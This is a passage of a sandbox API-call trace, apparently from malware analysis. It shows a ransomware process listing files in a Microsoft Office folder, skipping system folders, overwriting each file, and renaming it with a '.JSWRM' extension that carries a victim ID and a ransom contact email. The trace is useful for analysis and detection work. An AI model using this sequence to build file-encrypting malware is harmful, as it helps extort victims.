(lpString1="Microsoft.Lync.Utilities.Controls.zip", lpString2="system volume information") returned -1 [0135.929] lstrcmpiW (lpString1="Microsoft.Lync.Utilities.Controls.zip", lpString2="msocache") returned -1 [0135.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Lync.Utilities.Controls.zip", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0135.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Lync.Utilities.Controls.zip", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Lync.Utilities.Controls.zip", lpUsedDefaultChar=0x0) returned 37 [0135.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Lync.Utilities.Controls.zip", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0135.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Lync.Utilities.Controls.zip", cchWideChar=37, lpMultiByteStr=0x22ce70, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Lync.Utilities.Controls.zip", lpUsedDefaultChar=0x0) returned 37 [0135.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.929] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.929] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Microsoft.Lync.Utilities.Controls.zip" (normalized: "c:\\program files\\microsoft office\\root\\office16\\microsoft.lync.utilities.controls.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0135.930] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=28786) returned 1 [0135.930] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.930] ReadFile (in: hFile=0x45c, lpBuffer=0x27b348, nNumberOfBytesToRead=0x7070, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345ec04*=0x7070, lpOverlapped=0x0) returned 1 [0135.933] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.933] WriteFile (in: hFile=0x45c, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x7070, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345ec00*=0x7070, lpOverlapped=0x0) returned 1 [0135.934] CloseHandle (hObject=0x45c) returned 1 [0135.934] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Microsoft.Lync.Utilities.Controls.zip" (normalized: "c:\\program files\\microsoft office\\root\\office16\\microsoft.lync.utilities.controls.zip"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Microsoft.Lync.Utilities.Controls.zip.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\microsoft.lync.utilities.controls.zip.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.935] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b2049f6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1135c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Microsoft.Lync.Utilities.zip", cAlternateFileName="MICROS~3.ZIP")) returned 1 [0135.935] lstrcmpiW (lpString1="Microsoft.Lync.Utilities.zip", lpString2=".") returned 1 [0135.935] lstrcmpiW (lpString1="Microsoft.Lync.Utilities.zip", lpString2="..") returned 1 [0135.935] lstrcmpiW (lpString1="Microsoft.Lync.Utilities.zip", lpString2="...") returned 1 [0135.935] lstrcmpiW (lpString1="Microsoft.Lync.Utilities.zip", lpString2="windows") returned -1 [0135.935] lstrcmpiW (lpString1="Microsoft.Lync.Utilities.zip", lpString2="recovery") returned -1 [0135.935] lstrcmpiW (lpString1="Microsoft.Lync.Utilities.zip", lpString2="perflogs") returned -1 [0135.935] lstrcmpiW (lpString1="Microsoft.Lync.Utilities.zip", lpString2="documents and settings") returned 1 [0135.935] lstrcmpiW (lpString1="Microsoft.Lync.Utilities.zip", lpString2="$RECYCLE.BIN") returned 1 [0135.935] lstrcmpiW (lpString1="Microsoft.Lync.Utilities.zip", lpString2="system volume information") returned -1 [0135.935] lstrcmpiW (lpString1="Microsoft.Lync.Utilities.zip", lpString2="msocache") returned -1 [0135.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Lync.Utilities.zip", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0135.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Lync.Utilities.zip", cchWideChar=28, lpMultiByteStr=0x2411c8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Lync.Utilities.zip", lpUsedDefaultChar=0x0) returned 28 [0135.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Lync.Utilities.zip", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0135.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Lync.Utilities.zip", cchWideChar=28, lpMultiByteStr=0x240f70, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Lync.Utilities.zip", lpUsedDefaultChar=0x0) returned 28 [0135.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.936] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Microsoft.Lync.Utilities.zip" (normalized: "c:\\program files\\microsoft office\\root\\office16\\microsoft.lync.utilities.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0135.937] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=70492) returned 1 [0135.937] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.937] ReadFile (in: hFile=0x45c, lpBuffer=0x27b348, nNumberOfBytesToRead=0x11350, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345ec04*=0x11350, lpOverlapped=0x0) returned 1 [0135.944] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.944] WriteFile (in: hFile=0x45c, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x11350, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345ec00*=0x11350, lpOverlapped=0x0) returned 1 [0135.945] CloseHandle (hObject=0x45c) returned 1 [0135.945] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Microsoft.Lync.Utilities.zip" (normalized: "c:\\program files\\microsoft office\\root\\office16\\microsoft.lync.utilities.zip"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Microsoft.Lync.Utilities.zip.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\microsoft.lync.utilities.zip.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.946] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d91898, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1d91898, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x417af59, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x106e0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0135.946] lstrcmpiW (lpString1="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpString2=".") returned 1 [0135.946] lstrcmpiW (lpString1="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpString2="..") returned 1 [0135.946] lstrcmpiW (lpString1="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpString2="...") returned 1 [0135.946] lstrcmpiW (lpString1="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpString2="windows") returned -1 [0135.946] lstrcmpiW (lpString1="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpString2="recovery") returned -1 [0135.946] lstrcmpiW (lpString1="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpString2="perflogs") returned -1 [0135.946] lstrcmpiW (lpString1="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpString2="documents and settings") returned 1 [0135.946] lstrcmpiW (lpString1="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpString2="$RECYCLE.BIN") returned 1 [0135.946] lstrcmpiW (lpString1="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpString2="system volume information") returned -1 [0135.946] lstrcmpiW (lpString1="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpString2="msocache") returned -1 [0135.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0135.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", cchWideChar=52, lpMultiByteStr=0x20dde8, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpUsedDefaultChar=0x0) returned 52 [0135.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0135.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", cchWideChar=52, lpMultiByteStr=0x20d608, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpUsedDefaultChar=0x0) returned 52 [0135.946] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b1de7ad, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8a558, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Microsoft.Office.PolicyTips.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0135.946] lstrcmpiW (lpString1="Microsoft.Office.PolicyTips.dll", lpString2=".") returned 1 [0135.946] lstrcmpiW (lpString1="Microsoft.Office.PolicyTips.dll", lpString2="..") returned 1 [0135.946] lstrcmpiW (lpString1="Microsoft.Office.PolicyTips.dll", lpString2="...") returned 1 [0135.946] lstrcmpiW (lpString1="Microsoft.Office.PolicyTips.dll", lpString2="windows") returned -1 [0135.946] lstrcmpiW (lpString1="Microsoft.Office.PolicyTips.dll", lpString2="recovery") returned -1 [0135.946] lstrcmpiW (lpString1="Microsoft.Office.PolicyTips.dll", lpString2="perflogs") returned -1 [0135.947] lstrcmpiW (lpString1="Microsoft.Office.PolicyTips.dll", lpString2="documents and settings") returned 1 [0135.947] lstrcmpiW (lpString1="Microsoft.Office.PolicyTips.dll", lpString2="$RECYCLE.BIN") returned 1 [0135.947] lstrcmpiW (lpString1="Microsoft.Office.PolicyTips.dll", lpString2="system volume information") returned -1 [0135.947] lstrcmpiW (lpString1="Microsoft.Office.PolicyTips.dll", lpString2="msocache") returned -1 [0135.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PolicyTips.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0135.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PolicyTips.dll", cchWideChar=31, lpMultiByteStr=0x240fe8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PolicyTips.dll", lpUsedDefaultChar=0x0) returned 31 [0135.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PolicyTips.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0135.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PolicyTips.dll", cchWideChar=31, lpMultiByteStr=0x241010, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PolicyTips.dll", lpUsedDefaultChar=0x0) returned 31 [0135.947] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1db7a09, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1db7a09, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x45cd2b0, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xa2c40, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="microsoft.office.workflow.actions.proxy.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0135.947] lstrcmpiW (lpString1="microsoft.office.workflow.actions.proxy.dll", lpString2=".") returned 1 [0135.947] lstrcmpiW (lpString1="microsoft.office.workflow.actions.proxy.dll", lpString2="..") returned 1 [0135.947] lstrcmpiW (lpString1="microsoft.office.workflow.actions.proxy.dll", lpString2="...") returned 1 [0135.947] lstrcmpiW (lpString1="microsoft.office.workflow.actions.proxy.dll", lpString2="windows") returned -1 [0135.947] lstrcmpiW (lpString1="microsoft.office.workflow.actions.proxy.dll", lpString2="recovery") returned -1 [0135.947] lstrcmpiW (lpString1="microsoft.office.workflow.actions.proxy.dll", lpString2="perflogs") returned -1 [0135.947] lstrcmpiW (lpString1="microsoft.office.workflow.actions.proxy.dll", lpString2="documents and settings") returned 1 [0135.947] lstrcmpiW (lpString1="microsoft.office.workflow.actions.proxy.dll", lpString2="$RECYCLE.BIN") returned 1 [0135.947] lstrcmpiW (lpString1="microsoft.office.workflow.actions.proxy.dll", lpString2="system volume information") returned -1 [0135.947] lstrcmpiW (lpString1="microsoft.office.workflow.actions.proxy.dll", lpString2="msocache") returned -1 [0135.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="microsoft.office.workflow.actions.proxy.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0135.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="microsoft.office.workflow.actions.proxy.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="microsoft.office.workflow.actions.proxy.dll", lpUsedDefaultChar=0x0) returned 43 [0135.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="microsoft.office.workflow.actions.proxy.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0135.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="microsoft.office.workflow.actions.proxy.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="microsoft.office.workflow.actions.proxy.dll", lpUsedDefaultChar=0x0) returned 43 [0135.947] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1db7a09, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1db7a09, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3f64de3, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xafea8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="microsoft.sharepoint.workflowactions.proxy.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0135.947] lstrcmpiW (lpString1="microsoft.sharepoint.workflowactions.proxy.dll", lpString2=".") returned 1 [0135.947] lstrcmpiW (lpString1="microsoft.sharepoint.workflowactions.proxy.dll", lpString2="..") returned 1 [0135.947] lstrcmpiW (lpString1="microsoft.sharepoint.workflowactions.proxy.dll", lpString2="...") returned 1 [0135.947] lstrcmpiW (lpString1="microsoft.sharepoint.workflowactions.proxy.dll", lpString2="windows") returned -1 [0135.947] lstrcmpiW (lpString1="microsoft.sharepoint.workflowactions.proxy.dll", lpString2="recovery") returned -1 [0135.947] lstrcmpiW (lpString1="microsoft.sharepoint.workflowactions.proxy.dll", lpString2="perflogs") returned -1 [0135.948] lstrcmpiW (lpString1="microsoft.sharepoint.workflowactions.proxy.dll", lpString2="documents and settings") returned 1 [0135.948] lstrcmpiW (lpString1="microsoft.sharepoint.workflowactions.proxy.dll", lpString2="$RECYCLE.BIN") returned 1 [0135.948] lstrcmpiW (lpString1="microsoft.sharepoint.workflowactions.proxy.dll", lpString2="system volume information") returned -1 [0135.948] lstrcmpiW (lpString1="microsoft.sharepoint.workflowactions.proxy.dll", lpString2="msocache") returned -1 [0135.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="microsoft.sharepoint.workflowactions.proxy.dll", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0135.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="microsoft.sharepoint.workflowactions.proxy.dll", cchWideChar=46, lpMultiByteStr=0x22d260, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="microsoft.sharepoint.workflowactions.proxy.dll", lpUsedDefaultChar=0x0) returned 46 [0135.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="microsoft.sharepoint.workflowactions.proxy.dll", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0135.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="microsoft.sharepoint.workflowactions.proxy.dll", cchWideChar=46, lpMultiByteStr=0x22d0d8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="microsoft.sharepoint.workflowactions.proxy.dll", lpUsedDefaultChar=0x0) returned 46 [0135.948] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b250ebf, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x908a0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MIMEDIR.DLL", cAlternateFileName="")) returned 1 [0135.948] lstrcmpiW (lpString1="MIMEDIR.DLL", lpString2=".") returned 1 [0135.948] lstrcmpiW (lpString1="MIMEDIR.DLL", lpString2="..") returned 1 [0135.948] lstrcmpiW (lpString1="MIMEDIR.DLL", lpString2="...") returned 1 [0135.948] lstrcmpiW (lpString1="MIMEDIR.DLL", lpString2="windows") returned -1 [0135.948] lstrcmpiW (lpString1="MIMEDIR.DLL", lpString2="recovery") returned -1 [0135.948] lstrcmpiW (lpString1="MIMEDIR.DLL", lpString2="perflogs") returned -1 [0135.948] lstrcmpiW (lpString1="MIMEDIR.DLL", lpString2="documents and settings") returned 1 [0135.948] lstrcmpiW (lpString1="MIMEDIR.DLL", lpString2="$RECYCLE.BIN") returned 1 [0135.948] lstrcmpiW (lpString1="MIMEDIR.DLL", lpString2="system volume information") returned -1 [0135.948] lstrcmpiW (lpString1="MIMEDIR.DLL", lpString2="msocache") returned -1 [0135.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MIMEDIR.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0135.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MIMEDIR.DLL", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MIMEDIR.DLL", lpUsedDefaultChar=0x0) returned 11 [0135.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MIMEDIR.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0135.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MIMEDIR.DLL", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MIMEDIR.DLL", lpUsedDefaultChar=0x0) returned 11 [0135.948] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9a77594, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x9ac0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MINSBPROXY.DLL", cAlternateFileName="MINSBP~1.DLL")) returned 1 [0135.948] lstrcmpiW (lpString1="MINSBPROXY.DLL", lpString2=".") returned 1 [0135.948] lstrcmpiW (lpString1="MINSBPROXY.DLL", lpString2="..") returned 1 [0135.948] lstrcmpiW (lpString1="MINSBPROXY.DLL", lpString2="...") returned 1 [0135.948] lstrcmpiW (lpString1="MINSBPROXY.DLL", lpString2="windows") returned -1 [0135.948] lstrcmpiW (lpString1="MINSBPROXY.DLL", lpString2="recovery") returned -1 [0135.948] lstrcmpiW (lpString1="MINSBPROXY.DLL", lpString2="perflogs") returned -1 [0135.948] lstrcmpiW (lpString1="MINSBPROXY.DLL", lpString2="documents and settings") returned 1 [0135.949] lstrcmpiW (lpString1="MINSBPROXY.DLL", lpString2="$RECYCLE.BIN") returned 1 [0135.949] lstrcmpiW (lpString1="MINSBPROXY.DLL", lpString2="system volume information") returned -1 [0135.949] lstrcmpiW (lpString1="MINSBPROXY.DLL", lpString2="msocache") returned -1 [0135.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MINSBPROXY.DLL", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0135.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MINSBPROXY.DLL", cchWideChar=14, lpMultiByteStr=0x345ef40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MINSBPROXY.DLL", lpUsedDefaultChar=0x0) returned 14 [0135.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MINSBPROXY.DLL", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0135.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MINSBPROXY.DLL", cchWideChar=14, lpMultiByteStr=0x345ef10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MINSBPROXY.DLL", lpUsedDefaultChar=0x0) returned 14 [0135.949] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda6387a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda6387a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x59b433, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa060, dwReserved0=0xa000000c, 